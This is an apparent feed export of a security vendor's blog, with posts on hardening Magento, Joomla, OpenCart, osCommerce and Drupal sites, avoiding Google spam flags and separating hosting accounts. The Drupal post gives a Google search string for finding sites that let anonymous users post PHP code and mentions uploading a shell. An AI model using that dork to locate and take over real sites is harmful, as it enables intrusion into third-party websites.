Website Protection – Security Blog https://blog.siteguarding.com Tue, 31 Oct 2017 05:48:11 +0000 en-US hourly 1 https://wordpress.org/?v=4.7.4 https://blog.siteguarding.com/wp-content/uploads/2016/07/cropped-Logo_sh_last_2_last-32x32.jpg Website Protection – Security Blog https://blog.siteguarding.com 32 32 10+1 Tips How to Improve the Security of Your Magento 2 Store https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/ Tue, 31 Oct 2017 05:48:11 +0000 https://blog.siteguarding.com/?p=492 Read More]]> magento antivirus

Security is the issue that should never be ignored by online merchants. And Magento 2 stores are not the exception to this rule. In this article, we will give you some useful tips how the security of your Magento 2 store can be improved. So, let’s start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform by adding new features and improving the old ones, in particular, the security issues. So, check for the latest updates from time to time to provide your web store with the latest protection solutions.

Use Reliable Magento 2 Extensions

The reason why Magento 2 extensions are so popular is that they allow enhancing the basic functionality of this platform. However, before installing any extension, make sure that this extension is provided by a truly reliable developer, not some defrauder. In addition, it’s recommended to download Magento 2 extensions from trustworthy resources, such as the Magento Marketplace site.

Create Encrypted Connection

If the data are transferred through an unencrypted connection, there is the risk that this data can be intercepted. However, this problem can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To perform the configuration, go to Stores-Configuration. In the Configuration menu, expand the Web option. In the panel opened, find the Base URL (Secure) section and expand it. Here, you can configure the URLs to establish the encrypted connection.

Use Two-factor Authentication

As a rule, a secure Magento 2 password is not the guarantee of complete protection of your store from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure that you have a backup version of all your web store files in case your store is hacked. The possibilities of Magento 2 allow you to backup the entire database of your site, including the system and media files.

To perform the backup, in your Magento 2 Admin Panel, click on System and choose Backups in the Tools section. In the panel opened, you can manage the backup process of your files. After the configuration is completed, apply changes by clicking on the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures e-mail addresses through which users can easily recover their passwords. Still, if your email ID was hacked, your Magento 2 store becomes subjected to hacker attacks. So, make sure that the email address given by Magento is not publicly known (change it if needed) and protected with the two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can be accessed from a particular IP address, just restrict the admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel opened, you can manage user roles in your store by clicking on the Add New Role button and ascribing the corresponding roles for particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is the technology that prevents hackers and even bots from accessing the database of your site. You can enable this technology in your Magento 2 Admin Panel.

First, click on Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu opened, expand the Advanced section and choose Admin. On the page opened, expand the CAPTCHA section. Here, you can enable the CAPTCHA feature for your web store and configure its settings. Don’t forget to save the configured settings by clicking on the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track the store admin activity through the Action Log feature. To enable the feature, in your Magento 2 Admin Panel, open Stores and choose Configuration in the Settings section. In the menu opened, expand the Advanced tab and choose Admin.

In the window opened, expand the Admin Actions Logging section. Here, you can configure the Action Log settings. When the configuration is completed, save changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always help to solve all the issues that you are dealing with. That’s why it’s recommended to use special services for analyzing web sites for potential security breaches at least once a year. By performing such checks, you can decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which always ready to help you with any security issues you face, grows constantly. What’s more important is that community members regularly release security reports related to the latest versions of Magento 2. So, visit Magento Forums to provide yourself with the latest Magento 2 security information!

Conclusion

The protection of a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in the article to enforce your site’s protection and leave no chance for hackers that may try to breach your security.

]]>
6 Tips How To Improve Magento Security https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/ Sat, 07 Oct 2017 21:34:51 +0000 https://blog.siteguarding.com/?p=488 Read More]]> magento security

While working with a Magento-based website you will be surprised by the number of built-in security features. But safety is a vital point and additional measures to make your website safer are at the stake. Let’s check what I suggest:

  1. Try to be ahead of Magento security updates. Magento developers are working off their socks to provide merchants with more powerful safety system. They try to consider all possible risks and prevent they happen. As a result new Magento versions are stuffed with features and software to snatch detected security risks.
  2. Don’t be rash! Try to avoid simple passwords included your data birth and others the same. Use random letter and figure combinations and change it regularly from time-to-time. And don’t use the same or a little bit similar passwords for your multiple accounts. This is the best thing that prevents you despite what CMS you apply to each your account doesn’t refer to your store.
  3. If you are happy owner of large business, you need more people engaged into store operation. It considerably increases the risk to be broken. It’s a mistake to provide an access to all administrative staff. It’s more reasonable they use different user accounts.
  4. In the ocean of Magento extensions, try to choose exceptionally checked extensions developers. It’s good to test something new. In general an experiment is the best way to select the most suitable things. But remember that when security is at a stake it’s better to pass by any experiments and choose well-tried products.
  5. You know that bugs (equipment failure, staff mistakes, force majors and etc.) are killing business. In this light you always should have your data backup. The perfect thing when you make more than single backup and regularly take your website data backups. It will play directly into your website restore in case of security break.
  6. Let two-factor authentication become a habit. The random password is good but it doesn’t guarantee experienced hackers detect a well-made password ever. Sending a login code to a mobile device is good and prevalent practice. It provides your store are protected from unauthorized login case.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

]]>
Why Magento Security is Important https://www.siteguarding.com/security-blog/why-magento-security-is-important/ Wed, 26 Jul 2017 11:13:54 +0000 https://blog.siteguarding.com/?p=455 Read More]]> magento security
Content management system Magento was developed in the US in 2007 by the well-known company Varien. The site management system Magento was developed in the US in 2007 by the well-known company Varien. Free CMS Magento is open-source software, developed on the basis ZendFramework and operates on a UNIX operating system. CMS is primarily suitable for developing large online stores. On this platform, there are already over 100,000 online resources in the network all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at a time, which is very convenient for administration. The catalog system is well structured, there is the possibility of comparing the goods. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort it according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the html code management; possibility for each product or category to add meta tags description and keywords; for each product you can add the right end in the site address, as well as Magento itself makes XML sitemap to the search engines. Magento provides a multicurrency and currency conversion system. This will become a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. All free of charge are recommended to be checked on the test form from the beginning, as many low-quality ones come across. For paid modules free technical support from developers is offered.

So, Magento CMS – a solid and high-quality platform, which is great for creating an online store. In some ways, it can be difficult for an inexperienced user, but its capabilities are much wider than other similar platforms. And if there are no functions in the basic configuration, then you can connect additional modules – at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent version of using a hacked site on Magento is the installation of a spy script that tracks forms and sends the values that they enter to the hacker. So the hacker gets access to the data of bank cards from which customers pay for purchases in the store, as well as personal data of the cardholder. That is, all those values that the buyer enters at the stage of registration of the order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, these pages contain in the address fragments “onepage”, “checkout”, “onestep” – ordering pages.
The script extracts data from the fields of the form input, select, textarea, checkbox, forms a message from them and sends them to the attacker’s site through ajax.

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

]]>
How to Harden Joomla Security https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/ Wed, 26 Jul 2017 09:42:18 +0000 https://blog.siteguarding.com/?p=444 Read More]]> joomla security
The virus is a software product and it does not get to the site by air. The virus is brought to the site after the hacking or the owner (administrator) of the site enters a virus with extensions and system templates. Lets consider the 6 main points of “entry” of viruses on the site.

1. Hacking server hosting provider

Any service hosting provider is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can react to this situation only sequentially, that is, to eliminate the consequences of hacking or attacking.

Protection against hacking of the hosting provider’s service can only be preventative.

Choosing a hosting provider, choose only trusted and top-end services. Note whether the hosting provider is using its data center or rents it. In a reviews of the hosting provider pay attention to the statistics of its downtime and unavailability of sites.

The “defenders” of sites have the first “golden” rule: for each domain (site), you need to create a separate user account. It practically doesn’t work out for Shared Hosting (hosting, where under the same account, you are allowed to create 2-20 sites), but it is quite feasible on VDS-servers. Such separation of sites by accounts, isolates sites from each other and when one site is infected, excludes a similar infection of other sites of the account.

2. Hacking the site through “holes”, the vulnerability of CMS

Any content management system (CMS) eventually becomes vulnerable. Not an exception and CMS Joomla. That is why it’s important for Joomla Security to monitor the system updates and periodically update it with new security releases.

3. Hacking CMS Joomla

Methods hacking CMS are as follows:

– Hacking Web site and download shells and backdoors through various forms of downloads: photos, media files, and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injections, XSS attacks, bruteforce);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and Webmasters’ sites, even the most famous ones, is the direct way to possible infection of the site. Sometimes, such a chain-loading extension, from user to user, leads to massive infection;
– Not recommended and all kinds of “torrent” trackers, offering a free download of a paid extension or template.

4. Hacking the Joomla site with a brute force attack

Bruteforce attack is the selection of the name and password of the site administrator. This loophole is closed by complex administrator passwords and changing the administrator’s name from the “admin” to another one.

5. Website hijacking FTP interception

Working with the site impossible to manage without access to an FTP site directory. FTP protocol is quite accessible and it would be strange if the attackers did not try to use this loophole. To protect yourself from this loophole, you need to use the SFTP protocol, create a separate FTP account for each site and not to store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not deal with the site by yourself and hire freelancers to change design or other work, it is possible a virus code infection.

]]>
How to Secure OpenCart CMS https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/ Tue, 25 Jul 2017 11:13:25 +0000 https://blog.siteguarding.com/?p=433 Read More]]> opencart cms
OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to immediately take care of the security and protection of your site from hacking by unauthorized persons. In this article, we’ll give you basic tips that will help you to improve the OpenCart Security of your site. First of all, the article is suitable for those who have their own online stores made on the basis of OpenCart, but, on the other hand, the tips are quite universal, so they will be interesting to site owners on other CMS.

1. Hiding the login to the administrative panel

By default, in order to enter the admin panel, usually used the following: your_site/admin. Naturally, the more information the hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address to the admin panel from /admin to another: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, change the name of the folder “admin” to another; second, make the same replacement in the “config.php” file inside the folder that you renamed; thirdly, sometimes you need to make changes to the “config.php” file in the root folder (check if there is mention of “admin” there).

2. Change the administrator’s login and password

After changing the address to enter the panel it is worth to think about changing the login, which also by default looks like “admin”. It should be noted that this is generally the main login, which is usually used on many CMS, so even if you have a store or site not on OpenCart, I still advise you to immediately change it.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. See the line in the login “admin” – go to the settings and change the login to another.

By the way, right there you can change the password – I strongly recommend that you do this by creating a password no shorter than ten characters. If you can not figure it out yourself, use one of the online services for generating passwords, which can be easily found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that by default is called admin (whose name was changed above) contain important information associated with the database, so it is recommended to change the permissions for these files to “Reading Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.

4. Failure to display errors

As a rule, hacking websites, hackers use different loopholes, and error messages that are displayed on the wrong actions are often very helpful for them. Therefore, I recommend you to refuse displaying these errors.

Here you, most likely, will have a question, but what if you need to look at the mistakes? To do this, you can use the error log file (its name is in the same block in the settings).

You can view it if you go to the root folder of the site, then in system and then in logs.

How to do it: go to the admin panel, point “System”, then “Settings” – and there in the settings open the “Server” tab, at the bottom there will be the “Errors” block, there you should put “No” in “Show errors”.

]]>
How to Protect osCommerce CMS from Hackers https://www.siteguarding.com/security-blog/how-to-protect-oscommerce-cms-from-hackers/ Tue, 25 Jul 2017 10:35:50 +0000 https://blog.siteguarding.com/?p=428 Read More]]> OSCOMMERCE CMS
OsCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and functionals that allow you to create a store of any complexity and any structure. However, it requires a certain professionalism.

OsCommerce is a free open source CMS that can be freely downloaded from the official portal of the system. There are also necessary modules and additions. Help and support can always be obtained in the community of osCommerce, thanks to the participants of which, by the way, there appeared a significant number of additional functionals of the system.

So today we will talk about the osCommerce Security of the online stores and safe behavior on the Internet.

Hacking online store is dangerous for both sides – the shop owner and customers. From the hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable information. Hackers can completely break the store. As a result, the seller loses reputation, and buyers – anonymity.

There are a lot of ways to protect your online store from hacking. In this article we will talk about the most accessible.

1. Encrypt the connection

Connect an SSL certificate to the server of your online store to enable a secure connection between the buyer’s browser and the store. This connection is almost impossible to hack. Therefore, an SSL connection is a musthave for any site that processes customer’s personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in programs: operating system, browser, CMS. You need to quickly close these holes in security by updates.

3. Two-step authorization

Two-stage authorization is one of the most reliable ways to protect from hacking, so this authorization is used by Internet banks.

After entering the login and password, you receive a message on the phone with an access code. Login to the site is possible only by entering this code in a special field on the authorization page. Even if the attacker receives your password, he can’t enter the site without your mobile phone.

4. Using Password Managers

For osCommerce security, you need to use complex passwords, unique to each resource. In order not to keep all passwords in the head or on a piece of paper under the keyboard, use the password manager. Password Manager will generate reliable passwords for you and store them. Access to passwords in the manager can be obtained only with the help of a master password. So just remember the master password.

5. Protect devices

All previous methods protect you against software hacking. But you can get a completely desperate attacker who will try to access your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-complete passwords. And now access is already in his hands.

To protect devices, set up encryption. The easiest way is to set the administrator password to log in to the computer and the lockscreen on the mobile device.

But it’s better to use advanced encryption. For different devices, different methods.

These methods – just the tip of the security. So start using them now if you are not already using it.

]]>
How to Hack Website on Drupal CMS https://www.siteguarding.com/security-blog/how-to-hack-website-on-drupal-cms/ Tue, 25 Jul 2017 10:23:28 +0000 https://blog.siteguarding.com/?p=417 Read More]]> drupal security

Drupal – one of the most famous and popular open CMS in PHP. CMS itself is built on the right approach and with an eye to safety guideline. CMS Drupal in its architecture is a very secure system, kernel and module security fixes come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only using unverified modules, programmer errors, creating their own modules for the site, also server configuration errors or non-compliance with the Drupal Security foundations can be the reason for the hacking.

By the way, very often the Drupal Security group issues security news with a critical level of vulnerability. Therefore, Drupal is safe for the time being, until a new version comes out, in which the removed vulnerability will be revealed to all hackers. Often sites on Drupal that are not updated immediately after the release of the security update are under attack by hackers.

As with other CMS, most of the vulnerabilities come out of various plugins, themes and other custom functions. It is most convenient to have a tool that shows the versions of Drupal and its components. Knowing them, you can search for known vulnerabilities.

Usually, vulnerabilities are detected by bots – programs that are written by hackers to search Internet sites on different CMS. Bots perform basic actions, for example, try to register or enter the admin 11111 password and other more complex actions. In case the site does have a vulnerability, the bot implements the program and sends information to the hacker database of broken sites, then the attacker can perform illegal actions if your site is profitable, for example, has a high attendance.

But now we will talk about the vulnerability of another kind, namely about the stupidity, oversights and disorder of those web developers, who gives an access to the input format “PHP Code” for anonymous and other users. And it allows you to run any php code without having access to the site admin area. In all instructions for Drupal Security write to be careful with the built-in module “PHP Code” andl not to permit access to it to strangers, and even less to unauthorized visitors. But, as we will see, these requirements are often neglected…

To search for vulnerable sites running on Drupal, will help us all-powerful Google. Its search operators allow you to find sites for many, very interesting parameters. We will look for indexed pages for editing materials, where one (or only) input filter is “PHP code”.

Search Algorithm:
1. The page URL must contain “node” and “edit”;
2. The page in the text should mention the phrase “You may post PHP code”.

The “inurl” operator, which allows us to find sites containing certain words in the URL, will help us in this, in our case this is “node” and “edit”.

A search for these criteria is performed by the line: inurl:node inurl:edit “You may post PHP code”

Next you will see a list of vulnerable sites running on Drupal. Obviously, many of them have already been used by spammers.

What to do with it to protect your Drupal website? Pour the shell, spam the site, scan the server.

How to protect yourself from this? Disable the “PHP Code” module. If this can not be done at all, then limit the rights to it to a minimum of people, preferably only to the chief administrator.

So don’t commit such nonsense, keep your kernel and modules up-to-date and your site will be safe!

]]>
Ways to Avoid the Google Spam Filter https://www.siteguarding.com/security-blog/ways-to-avoid-the-google-spam-filter/ Sat, 13 May 2017 10:46:46 +0000 https://blog.siteguarding.com/?p=404 Read More]]> google spam

Google’s infamous spam filter has weeded out a lot of junk on the internet, but it has also weeded out a lot of quality sites that were guilty of nothing more than improper SEO tactics.

Google Webmaster Tools does let you know when you have been flagged for certain errors, but it doesn’t necessarily let you know if you are being put through Google’s spam filter. Luckily, Google has given you plenty of tips for avoiding the spam, but it is up to you if you follow them or not.

Keyword Stuffing Should Never Be Used

You aren’t earning your website any good ranks or favors by stuffing keywords. Google has made it clear that if you stuff your meta descriptions, content and tags with keywords, you are going to be flagged by their spam filter. The same goes for using irrelevant keywords just to rank. Use relevant keywords at a healthy density — no more than five percent.

Don’t Commit Redirects

Usually redirects are going to get you in trouble. While some redirects are unavoidable, that will turn Google spam filters on to your site. Some things to avoid with redirects include:

  1. Using unnecessary redirects — especially if you are redirecting someone from the homepage that just showed up on the search engine results page.
  2. Using splash pages as a way to replace the homepage URL.
  3. Using expired domains that had high traffic in the past just to redirect users to your own irrelevant, poor quality content.

Avoid All Bad Linking Activities

While the use of links can be beneficial to your readers, such as directing them to a relevant blog post on your site for further reading, most links just get you into trouble with Google. Google has made it clear they want high quality, relevant linking practices on sites, so:

  1. Stop using “click here” or “read more here” as your anchor text for links. These types of phrases instantly turn on Google spam to your site.
  2. Don’t use any link farm practices or link exchanges — whether they are relevant or not.
  3. Don’t use unclear anchor text to direct readers to other sites — such as using unclear text to send them to your affiliate marketing page.
  4. Don’t buy or participate in link sponsorship programs of any kind.
  5. Don’t link to off topic sites.

Google spam could ruin your site’s rank if you’re not careful. By just following good SEO practices, you can avoid being tossed into the “spam” file. Even if you are considered spam, by taking the time to correct the errors you might be able to recover your site’s bad status.

]]>
Never Host Multiple Domains on One Hosting Account https://www.siteguarding.com/security-blog/never-host-multiple-domains-on-one-hosting-account/ Tue, 14 Feb 2017 09:29:42 +0000 https://blog.siteguarding.com/?p=393 Read More]]> secure hosting

That’s my rule of thumb. If you want to know why, when there are exceptions, and how to best manage multiple domains, then you should read this article.

Hosting companies are quick to sell you on the idea of hosting multiple domains on a single account. And webmasters are quick to do the math: $10 per month for 5 websites is cheaper than 5 x $10 per month. Well, you should know that there is a danger in this kind of thinking.

The way multiple domains work is they’re in separate folders within the root directory of your hosting account. And that means if a hacker gets into your account, they can access all of those folders. All your sites can be compromised at a single stroke. So all what hacker need is just an access to one of your websites.

If each domain is in a separate hosting account, you’ve isolated the individual sites. Assuming that you’ve got strong passwords on each account, that’s a lot of extra work for the hackers to do the damage they could do in a single account with multiple domains. This is why we at Siteguarding never keep multiple domains on the same hosting account. We always create a separate hosting account for each your website.

Some will argue that simply having good backups is enough and if your site gets hacked you can just restore all the domains with the backup. But most hacking isn’t about crashing sites – it’s about using sites to generate fake pages to scam search engines or to scrape data from your files and visitors or to send out spam emails. All of which can be happening without you knowing. Backups are only of use once you find out the hack has taken place, which may be long after the damage is done.

Others will argue that it’s easier to maintain multiple domains from a single account, but really, how often do you need to access your hosting account? Creating or deleting email account is probably the most common use, and for most small businesses, that doesn’t happen very often. It may take a little extra time and organization to maintain separate hosting accounts, but again, it’s very little compared to the danger of exposing multiple sites to a single hack.

]]>
How to Protect Your Website From Hackers https://www.siteguarding.com/security-blog/how-to-protect-your-website-from-hackers/ Wed, 26 Oct 2016 13:50:21 +0000 https://blog.siteguarding.com/?p=363 Read More]]> hack-blog

One of the biggest false beliefs circulated in the internet ownership and website security community is that “your site is not a big one, so there’s nothing worth being hacked for”. This particular belief has always led to dismay, because to the site owner’s surprise, he/she gets hacked and may lose everything. In fact, this popular belief may actually be propagated by hackers, because it creates laxity in the web owners, keeping their guards down and making their defenses exploitable. The truth is that websites get hacked all the time, size and function do not matter at all.

Majority of security breaches are not necessarily attempts to steal your data or deface your website, but are devious attempts at turning your server into an email relay for spam or to a temporary web server, usually to serve illegal files. In this article we will try to give you some tips on how to protect your website from hackers.As terrible as this may seem, keeping these people at bay is very possible and all requirements for this are of extreme importance. There are a few fundamental actions you can take to keep your site out of sight to these website vandals and make sure it takes a lot of hard work for hackers to find your website.

Update Everything You Have

Whether you’ve created a DIY site on a third party turnkey platform or chose to build from scratch with your development team, as a site owner, you must make sure that every piece of software run by you is up to date. CMS providers like Joomla, Ilk and WordPress stay on constant guard, continuously scouring for holes to plug in their systems and hit the internet with regular patches and updates to ensure that their software is impervious to attacks. Make sure you run these updates and always have the most recent version supporting your site at all times.

If your site uses third party plug-ins, you should stay updated with information about their updates and make sure all are implemented in a timely fashion. Lots of sites often make the mistake of including plug-ins that fall into disuse with time. Ensure that you do regular cleanups, wipe out all unused, old and non-updated plug-ins, they pose the threat of being a gateway for hackers to exploit and wreck your site.

Reinforce Security Around Your Site

Just as you install antivirus on your desktop before browsing the web and securely lock your doors before leaving your house, you should also install a security system to be your site’s first line of defense against malicious attacks by hackers. This first line of defense is always a web application firewall. These are designed to inspect incoming traffic, identify and sift out malicious requests, protecting your website from SPAM, cross site scripting, brute force attacks and other high level threats. You can take a look at website antivirus we offer.

A few years ago, web application firewalls were solely hardware appliances but quite recently, a few providers of Security-As-a-Service (SecAaS) have begun to use cloud hosting technology to water down the prices of security solutions. As a result of this, all website owners can now rent a cloud based web application firewall without costly security appliances or even a dedicated hosting server. Better yet, you won’t need a course in website security or hire security experts to utilize these services.

With a huge amount of websites getting hacked every year, it has become obvious that hosting providers cannot efficiently handle all website security threats and the rise of cloud based web application firewalls is quickly filling its void.

HTTPS

Hyper Text Transfer Protocol Secure (HTTPS) is a secure communications protocol that transfers sensitive information between a web site and a web server. Moving your website to this protocol definitely means adding an encryption Transport Layer Security (TLS) or a Secure Sockets Layer (SSL) to your HTTP ensuring extra security from hackers for yours and your users’ data.

Although HTTPS is necessary for all online transactions, the ratio of sites that run on HTTP outnumbers them 100’s: 1. Currently, adding a secure protocol layer won’t only guarantee security, it will help search ranking as GOOGLE has recently announced that HTTPS will be taken as a ranking factor.

Use Strong Passwords And Change Them Regularly

Brute force attacks work mainly by guessing username/password combinations. These have been reported to be on an alarming rise in the last two years as thousands of attacks are detected every day across the web. Brute force and dictionary attacks can be effectively eliminated by using strong passwords. Strong passwords aren’t just important for only email and financial transactions; they are even doubly important for your website server, admin and database passwords.

What makes up a strong password? A strong password should be a combination of alphanumeric characters, upper and lower case letters and symbols and should be at least 12 characters long. A combination like this can prevent brute force attacks.

Passwords should also not be the same for all website logins. Change your passwords regularly to ensure breach-proof security and store users’ data in an encrypted form. This way, if your security is breached, there’s no way your attackers can steal your users’ information.

Conceal Your Admin Directories

One of the easiest ways hackers access your site’s data is by heading straight into your admin directories.

The scripts used by hackers scan directories on your web server looking for names like, ‘admin’, ‘login’ or ‘access’ etc. then focus all their energy on accessing these files to compromise your website security. Most popular CMS’s give you total control over names of your directories; a great idea would be to rename your admin folders. Pick names that would make these folders inconspicuous and communicate it only to your webmasters. This method can greatly reduce the risk of a potential breach.

One fact that every business owner knows and understands is that, “your reputation is everything”, therefore no cost can be too much as long as it secures your website and safeguards your reputation.

]]>